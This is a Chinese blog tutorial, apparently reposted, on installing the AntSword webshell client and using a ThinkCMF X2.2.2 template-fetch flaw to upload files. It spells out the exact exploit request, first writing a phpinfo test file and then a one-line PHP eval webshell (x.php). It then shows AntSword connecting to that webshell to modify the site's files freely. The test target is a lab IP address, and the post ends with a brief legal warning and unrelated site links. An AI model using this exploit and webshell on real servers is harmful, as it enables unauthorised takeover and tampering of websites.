蚁剑安装以及使用方法

蚁剑安装以及使用方法一 蚁剑如何安装蚁剑安装分两个步骤一个是下载源代码 还有一个加载器 用加载器去加载源代码 下载的的文件路径一定要记得蚁剑源码下载 https github com AntSwordProj antSword 蚁剑加载器下载 https github com AntSwordProj AntSword Loader 下载之后解压缩之后是这样的点击 AntSword Loader v4 0 3 win32 x64 这个文件打开 AntSword exe 点击初始化点击初始化点击选

一、蚁剑如何安装

蚁剑安装分两个步骤一个是下载源代码,还有一个加载器,用加载器去加载源代码,下载的的文件路径一定要记得
蚁剑源码下载:https://github.com/AntSwordProject/antSword

在这里插入图片描述

蚁剑加载器下载:https://github.com/AntSwordProject/AntSword-Loader

在这里插入图片描述

下载之后解压缩之后是这样的

在这里插入图片描述

点击AntSword-Loader-v4.0.3-win32-x64这个文件打开AntSword.exe

在这里插入图片描述

点击初始化

在这里插入图片描述

点击初始化点击选择antSword-2.0.3
antSword-2.0.3文件夹是代码(源码)的文件夹

在这里插入图片描述

之后再打开AntSword.exe

在这里插入图片描述
在这里插入图片描述

打开以后是这样的

在这里插入图片描述

二、构造payload上传文件

我这里使用的是ThinkCMF X2.2.2框架搭建的网站,等下用这个网站测试一下。
先用这句代码测试一下网站
点击回车

在这里插入图片描述

如果什么都没有显示说明上传成功.

在这里插入图片描述

分析一下上传的代码
?a=fetch&templateFile=public/index&prefix=''&content<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php> 

这里我们主要看一下后半句

file_put_contents(‘test.php’,’<?php phpinfo(); ?>’)

file_put_contents 
现在测试一下上传的代码是否能执行。

三、上传一句话木马文件

这里我构造的代码是

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('x.php','<?php @eval($_POST[a]); ?>')</php> 

这里注意里面的a参数不要加单引号,因为前面有单引号,不然就闭合的单引号会报错。

这里的说一下后半句代码

file_put_contents(‘x.php’,’<?php @eval($_POST[a]); ?>’)
这里x.php是上传的文件名

<?php @eval($_POST[a]); ?>这一句@表示抑制错误,eval是执行函数,POST代表的是传参的意思

接下来上传代码

在这里插入图片描述

四、蚁剑连接

这里是网站首页地址加一个/后面跟着文件名
列如:http://192.168.36.35:8002/x.php

在这里插入图片描述

点击添加

在这里插入图片描述

点击文件管理

在这里插入图片描述

接下来就可以对网站里的文件随意改动。

在这里插入图片描述

从入门到入狱:网络安全法

在这里插入图片描述

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/231482.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • 读懂蛋白质PDB文件

    读懂蛋白质PDB文件对于从事生物行业的朋友们来说,PDB文件和蛋白质结构是很多人绕不过去的问题。然而对于天天跑电泳过柱子的生物狗来说,PDB文件打开后与天书无异。这里,我转载一篇网上看到的关于PDB文件内记号说明的文章,希望对大家有用!教你读懂蛋白质的PDB文件&n…

    2022年6月2日
    158
  • python列表中两个冒号_python字符串中的冒号

    python列表中两个冒号_python字符串中的冒号1.冒号的用法1.1一个冒号a[i:j]这里的i指起始位置,默认为0;j是终止位置,默认为len(a),在取出数组中的值时就会从数组下标i(包括)一直取到下标j(不包括j)在一个冒号的情况下若出现负数则代表倒数某个位置a[i:-j]这里就是从下标i取到倒数第j个下标之前(不包括倒数第j个下标位置的元素)1.2两个冒号a[i:j:h]这里的i,j还是起始位置和终止位置,h是步长,默认为1若i/j…

    2022年8月13日
    6
  • linux强制删除只读文件夹,强制删除文件夹linux的方法是什么

    linux强制删除只读文件夹,强制删除文件夹linux的方法是什么灰烬里等你丶回答数:14479|被采纳数:22016-12-1714:18:36linux下删除文件的命令是rm;以下分两种介绍删除方法:对于目录文件的删除:#rf-rffilename对于非目录文件的删除:#rffilename之所以对于目录文件的删除加上了强制参数是因为在linux对目录文件的删除是递归式的;rm的参数如下所示:OPTIONSRemove(unlink)t…

    2022年6月13日
    38
  • 手机python 3.8解释器_Python 3.8 解释器安装教程

    手机python 3.8解释器_Python 3.8 解释器安装教程Python是一个门面向对象的解释型编程语言,如果要完成Python程序的开发,需要有Python解释器的支持,所以首先需要配置好Python解释器(本教程选择最新的Python3.8.3版本),没有安装的小伙伴,可以跟着一起操作哦。一、软件的下载1、下载【Python解释器】。官方网址为:www.python.org2、选择【Windows】系统,点击【Python3.8.3】,其中【V…

    2022年7月22日
    57
  • jsp网页在浏览器中不显示图片_eclipse环境下配置tomcat中jsp项目的虚拟路径[通俗易懂]

    遇到的问题是这样的,在jsp网页中嵌入了本地的图片,由于会用到上传到服务器的图片,所以没有放到项目里面,而是把所有图片单独放到一个文件夹里,然后打算使用绝对路径把要显示的图片显示出来,比如是放在了E盘的uploadPhotos文件夹里,但是在使用绝对路径显示时,代码如下:在eclipse中的内置浏览器里面是可以显示的,但是到其他浏览器都不显示,后来看到这篇文章http://bbs.csdn.net

    2022年3月11日
    47
  • Linux(centos7)离线安装Kubernetes1.19.2和docker——images导入导出

    Linux(centos7)离线安装Kubernetes1.19.2和docker——images导入导出

    2021年5月15日
    249

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号